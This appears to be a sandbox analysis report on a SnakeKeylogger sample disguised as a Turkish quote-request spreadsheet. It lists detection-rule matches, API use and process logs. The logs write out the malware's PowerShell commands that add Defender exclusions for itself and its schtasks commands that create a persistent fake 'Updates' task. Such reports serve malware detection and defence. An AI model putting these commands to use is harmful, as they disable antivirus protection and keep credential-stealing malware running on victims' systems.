Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OnCgVRIhY.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, safV0hi54xbxv1r7gV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	Security API names: _0020.SetAccessControl
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, safV0hi54xbxv1r7gV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Mutant created: \Sessions\1\BaseNamedObjects\YbFhKycGgIWiKQVsljvxPKhn
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2584:120:WilError_03

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1B98.tmp

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.000000000321D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
